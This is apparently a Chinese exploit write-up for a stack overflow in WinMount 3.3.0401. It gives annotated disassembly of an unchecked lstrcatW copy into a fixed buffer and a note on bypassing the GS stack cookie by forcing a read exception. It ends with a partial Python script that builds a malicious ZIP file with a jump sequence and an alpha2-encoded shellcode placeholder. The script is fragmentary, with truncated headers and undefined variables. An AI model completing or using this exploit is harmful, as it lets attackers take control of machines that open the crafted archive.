影响产品:WinMount 3.3.0401
.text:100B5460 vul_ proc near ; CODE XREF: sub_100B64B0+2EEp
.text:100B5460 var_214 = dword ptr -214h
.text:100B5460 var_210 = dword ptr -210h
.text:100B5460 buf_20c = byte ptr -20Ch
.text:100B5460 arg_0 = dword ptr 4
.text:100B5460 arg_4 = dword ptr 8
.text:100B5460 arg_8 = dword ptr 0Ch
.text:100B5460 arg_C = dword ptr 10h
.text:100B5460 arg_10 = dword ptr 14h
.text:100B5460 arg_14 = dword ptr 18h
.text:100B5460 arg_18 = dword ptr 1Ch
.text:100B5460 sub esp, 214h
.text:100B5466 mov eax, dword_10101D2C
.text:100B546B xor eax, esp
.text:100B546D mov dword ptr [esp+214h+buf_20c+208h], eax
.text:100B5474 mov ecx, [esp+214h+arg_18]
.text:100B547B mov edx, [esp+214h+arg_4]
.text:100B5482 mov eax, [esp+214h+arg_C]
.text:100B5489 push ebx
.text:100B548A push ebp
.text:100B548B mov ebp, [esp+21Ch+arg_0]
.text:100B5492 push esi
.text:100B5493 mov esi, [esp+220h+arg_8]
.text:100B549A push edi
.text:100B549B mov [esp+224h+var_214], ecx
.text:100B549F push edx
.text:100B54A0 lea ecx, [ebp+58h]
.text:100B54A3 mov [esp+228h+var_210], eax
.text:100B54A7 call sub_100B5260
.text:100B54AC mov edi, [eax]
.text:100B54AE mov byte ptr [esi+6Ch], 1
.text:100B54B2 mov eax, [edi+26h]
.text:100B54B5 mov [esi+20h], eax
.text:100B54B8 mov eax, [edi+2Ah]
.text:100B54BB xor ebx, ebx
.text:100B54BD cmp eax, ebx
.text:100B54BF jz short loc_100B54D0
.text:100B54C1 cmp eax, 0FFFFFFFFh
.text:100B54C4 jz short loc_100B54D0
.text:100B54C6 mov byte ptr [esi+6Bh], 1
.text:100B54CA mov ecx, [edi+2Ah]
.text:100B54CD mov [esi+24h], ecx
.text:100B54D0 loc_100B54D0: ; CODE XREF: vul_vul+5Fj
.text:100B54D0 ; vul_vul+64j
.text:100B54D0 cmp [edi+0Eh], ebx
.text:100B54D3 ja short loc_100B54DA
.text:100B54D5 cmp [edi+0Ah], ebx
.text:100B54D8 jbe short loc_100B54DE
.text:100B54DA loc_100B54DA: ; CODE XREF: vul_vul+73j
.text:100B54DA mov al, 1
.text:100B54DC jmp short loc_100B54E0
.text:100B54DE ; ---------------------------------------------------------------------------
.text:100B54DE loc_100B54DE: ; CODE XREF: vul_vul+78j
.text:100B54DE xor al, al
.text:100B54E0 loc_100B54E0: ; CODE XREF: vul_vul+7Cj
.text:100B54E0 test byte ptr [esi+20h], 10h
.text:100B54E4 mov [esi+68h], al
.text:100B54E7 setnbe dl
.text:100B54EA mov [esi+69h], dl
.text:100B54ED mov [esi+6Ah], bl
.text:100B54F0 mov eax, [edi+1Ah]
.text:100B54F3 mov ecx, [edi+1Eh]
.text:100B54F6 mov edx, eax
.text:100B54F8 or edx, ecx
.text:100B54FA jz short loc_100B5512
.text:100B54FC add eax, [esp+224h+arg_10]
.text:100B5503 adc ecx, [esp+224h+arg_14]
.text:100B550A mov [esi+60h], eax
.text:100B550D mov [esi+64h], ecx
.text:100B5510 jmp short loc_100B5518
.text:100B5512 ; ---------------------------------------------------------------------------
.text:100B5512 loc_100B5512: ; CODE XREF: vul_vul+9Aj
.text:100B5512 mov [esi+60h], ebx
.text:100B5515 mov [esi+64h], ebx
.text:100B5518 loc_100B5518: ; CODE XREF: vul_vul+B0j
.text:100B5518 push 206h ; size_t
.text:100B551D lea ecx, [esp+228h+buf_20c+2]
.text:100B5521 xor eax, eax
.text:100B5523 push ebx ; int
.text:100B5524 push ecx ; void *
.text:100B5525 mov word ptr [esp+230h+buf_20c], ax
.text:100B552A call _memset
.text:100B552F add esp, 0Ch
.text:100B5532 push edi ; int
.text:100B5533 lea edx, [esp+228h+buf_20c]
.text:100B5537 push edx ; dst_string
.text:100B5538 push ebp ; int
.text:100B5539 call sub_100B3F90 ;
.text:100B3F90 ; int __stdcall sub_100B3F90(int, LPWSTR dst_string, int)
.text:100B3F90 sub_100B3F90 proc near ; CODE XREF: sub_100B3F90+25p
.text:100B3F90 ; vul_vul+D9p
.text:100B3F90 arg_0 = dword ptr 4
.text:100B3F90 dst_string = dword ptr 8
.text:100B3F90 arg_8 = dword ptr 0Ch
.text:100B3F90 push ebx
.text:100B3F91 mov ebx, [esp+4+arg_8]
.text:100B3F95 mov eax, [ebx+5Ch]
.text:100B3F98 push esi
.text:100B3F99 mov esi, [esp+8+dst_string]
.text:100B3F9D push edi
.text:100B3F9E mov edi, ds:lstrcatW
.text:100B3FA4 test eax, eax
.text:100B3FA6 jz short loc_100B3FC2
.text:100B3FA8 cmp dword ptr [eax+56h], 0FFFFFFFFh
.text:100B3FAC jz short loc_100B3FC2
.text:100B3FAE push eax ; int
.text:100B3FAF mov eax, [esp+10h+arg_0]
.text:100B3FB3 push esi ; dst_string
.text:100B3FB4 push eax ; int
.text:100B3FB5 call sub_100B3F90
.text:100B3FBA push offset String2 ; "\\"
.text:100B3FBF push esi ; lpString1
.text:100B3FC0 call edi ; lstrcatW
.text:100B3FC2 loc_100B3FC2: ; CODE XREF: sub_100B3F90+16j
.text:100B3FC2 ; sub_100B3F90+1Cj
.text:100B3FC2 mov ecx, [ebx+52h]
.text:100B3FC5 push ecx ; lpString2
.text:100B3FC6 push esi ; lpString1
.text:100B3FC7 call edi ; lstrcatW ; 溢出
.text:100B3FC9 pop edi
.text:100B3FCA pop esi
.text:100B3FCB pop ebx
.text:100B3FCC retn 0Ch
.text:100B3FCC sub_100B3F90 endp
.text:100209C0 access_ proc near ; CODE XREF: sub_10020AE0+6Cp
.text:100209C0 ; sub_10021060+105p ...
.text:100209C0 p_string = dword ptr 4
.text:100209C0 push ebx
.text:100209C1 mov ebx, ecx
.text:100209C3 mov eax, [ebx]
.text:100209C5 push esi
.text:100209C6 xor ecx, ecx
.text:100209C8 push edi
.text:100209C9 mov edi, [esp+0Ch+p_string]
.text:100209CD mov dword ptr [ebx+4], 0
.text:100209D4 mov [eax], cx
.text:100209D7 xor esi, esi
.text:100209D9 cmp [edi], cx
.text:100209DC jz short loc_100209E7
.text:100209DE mov edi, edi
.text:100209E0 loc_100209E0: ; CODE XREF: access_+25j
.text:100209E0 inc esi
.text:100209E1 cmp [edi+esi*2], cx ; 可以制造出内存读异常--->绕过GS
.text:100209E5 jnz short loc_100209E0
.text:100209E7 loc_100209E7: ; CODE XREF: access_+1Cj
.text:100209E7 push esi
.text:100209E8 mov ecx, ebx
.text:100209EA call sub_10002F90
.text:100209EF mov ecx, [ebx]
.text:100209F1 mov edx, edi
.text:100209F3 loc_100209F3: ; CODE XREF: access_+42j
.text:100209F3 movzx eax, word ptr [edx]
.text:100209F6 mov [ecx], ax
.text:100209F9 add ecx, 2
.text:100209FC add edx, 2
.text:100209FF test ax, ax
.text:10020A02 jnz short loc_100209F3
.text:10020A04 pop edi
.text:10020A05 mov [ebx+4], esi
.text:10020A08 pop esi
.text:10020A09 mov eax, ebx
.text:10020A0B pop ebx
.text:10020A0C retn 4
.text:10020A0C access_ endp
import os
ldf_header =('\x50\x4B\x03\x04\x14\x00\x00'
cdf_header = ("\x50\x4B\x01\x02\x14\x00\x14"
eofcdf_header = ("\x50\x4B\x05\x06\x00\x00\x00"
print "[+] Preparing payload\n"
jumpto='\x05\x12\x11\x46\x2d\x11\x11\x46\x50\x46\xac\xe4'#make eax point to shellcode and jump to shellcode
shellcode=("the shellcode here will be changed into unicode")#encode by alpha2
evilzip = ldf_header+payload+cdf_header+payload+eofcdf_header
print "[+] Removing old zip file\n"
os.system("del "+sploitfile)
print "[+] Writing payload to file\n"
print "generate zip file "+(sploitfile)
print '[+] Wrote %d bytes to file sploitfile\n'%(len(evilzip))
print "[+] Payload length :%d \n"%(len(payload))